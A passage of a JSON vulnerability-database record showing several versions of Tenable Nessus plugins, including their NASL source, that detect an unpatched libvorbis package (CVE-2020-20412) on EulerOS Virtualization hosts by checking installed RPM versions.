"cvss3", "description", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr"], "edition": 3}, {"bulletin": {"id": "EULEROS_SA-2021-1440.NASL", "hash": "4e945d3d56e22aa42ff3c9f83cea0a3c", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)", "description": "According to the version of the libvorbis package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in StepMania 5.0.12 and other products, has insufficient array bounds checking via a crafted OGG file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2021-03-10T00:00:00", "modified": "2021-03-16T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147449", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20412", "http://www.nessus.org/u?27b9d79c"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-08-05T12:50:51", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-20412"]}, {"type": "nessus", "idList": ["EULEROS_SA-2021-1493.NASL"]}], "modified": "2021-08-05T12:50:51", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2021-08-05T12:50:51", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147449);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/16\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1440\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?27b9d79c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": [], "solution": "Update the affected libvorbis package.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-04T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-08-05T12:50:51", "differentElements": ["cpe"], "edition": 4}, {"bulletin": {"id": "EULEROS_SA-2021-1440.NASL", "hash": "ef46490542906a00d4ce0fc2617462c5", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)", "description": "According to the version of the libvorbis package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in StepMania 5.0.12 and other products, has insufficient array bounds checking via a crafted OGG file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2021-03-10T00:00:00", "modified": "2021-03-16T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147449", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20412", "http://www.nessus.org/u?27b9d79c"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-08-06T13:25:57", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-20412"]}, {"type": "nessus", "idList": ["EULEROS_SA-2021-1493.NASL"]}], "modified": "2021-08-06T13:25:57", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2021-08-06T13:25:57", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147449);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/16\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1440\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?27b9d79c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:libvorbis", "cpe:/o:huawei:euleros:uvp:3.0.2.6"], "solution": "Update the affected libvorbis package.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-04T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-08-06T13:25:57", "differentElements": ["nessusSeverity"], "edition": 5}], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-20412"]}, {"type": "nessus", "idList": ["EULEROS_SA-2021-1493.NASL"]}], "modified": "2021-08-19T12:05:36", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2021-08-19T12:05:36", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147449);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/16\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.2.6 : libvorbis (EulerOS-SA-2021-1440)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1440\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?27b9d79c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:libvorbis", "cpe:/o:huawei:euleros:uvp:3.0.2.6"], "solution": "Update the affected libvorbis package.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-04T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "EULEROS_SA-2021-1493.NASL", "hash": "4a0537cc27bd3f93864023bb3ce5a026", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)", "description": "According to the version of the libvorbis package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in StepMania 5.0.12 and other products, has insufficient array bounds checking via a crafted OGG file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2021-03-04T00:00:00", "modified": "2021-03-08T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147035", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?81d647ec", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20412"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-08-19T12:06:04", "history": [{"bulletin": {"id": "EULEROS_SA-2021-1493.NASL", "hash": "a164b921712570d1081d12c5ff52d8b68252efbbe97f29c86d4a5e0f75f01e56", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)", "description": "According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2021-03-04T00:00:00", "modified": "2021-03-04T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147035", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?81d647ec"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-03-05T19:47:35", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"modified": "2021-03-05T19:47:35", "references": [{"idList": ["CVE-2020-20412"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-03-05T19:47:35", "rev": 2, "value": 4.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147035", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147035);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/04\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1493\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?81d647ec\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libvorbis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libvorbis-1.3.3-8.h6.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvorbis\");\n}\n", "naslFamily": "Huawei Local Security Checks", "cpe": ["p-cpe:/a:huawei:euleros:libvorbis", "cpe:/o:huawei:euleros:uvp:3.0.6.6"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-05T19:47:35", "differentElements": ["sourceData"], "edition": 1}, {"bulletin": {"id": "EULEROS_SA-2021-1493.NASL", "hash": "33befd6f311de3fc442f05e3e078fca3a2959eb40dcd769f1dcde109588cbcbb", "type": "nessus", "bulletinFamily": "scanner", "title": "EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)", "description": "According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2021-03-04T00:00:00", "modified": "2021-03-04T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147035", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?81d647ec"], "cvelist": ["CVE-2020-20412"], "immutableFields": [], "lastseen": "2021-03-09T17:09:58", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2021-03-09T17:09:58", "references": [{"idList": ["EULEROS_SA-2021-1440.NASL"], "type": "nessus"}, {"idList": ["CVE-2020-20412"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-03-09T17:09:58", "rev": 2, "value": 5.0, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147035", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147035);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/08\");\n\n script_cve_id(\n \"CVE-2020-20412\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.6.6 : libvorbis (EulerOS-SA-2021-1493)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libvorbis package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - lib/codebook.c in libvorbis before 1.3.6, as used in\n StepMania 5.0.12 and other products, has insufficient\n array bounds checking via a crafted OGG\n file.(CVE-2020-20412)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1493\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?81d647ec\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libvorbis package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n 